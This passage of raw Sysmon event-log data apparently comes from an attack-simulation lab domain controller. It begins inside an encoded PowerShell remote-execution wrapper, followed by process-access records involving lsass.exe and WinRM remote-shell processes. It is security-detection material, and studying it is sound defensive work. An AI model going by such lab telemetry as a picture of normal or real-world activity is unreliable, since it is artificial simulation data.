zAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.852{10ACEC4A-83B9-5FCF-1400-000000009001}13282240C:\Windows\system32\svchost.exe{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-8516-5FCF-C102-000000009001}42764564C:\Windows\system32\conhost.exe{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8516-5FCF-C102-000000009001}4276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.822{10ACEC4A-8516-5FCF-C002-000000009001}2980C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.806{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:22.806{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 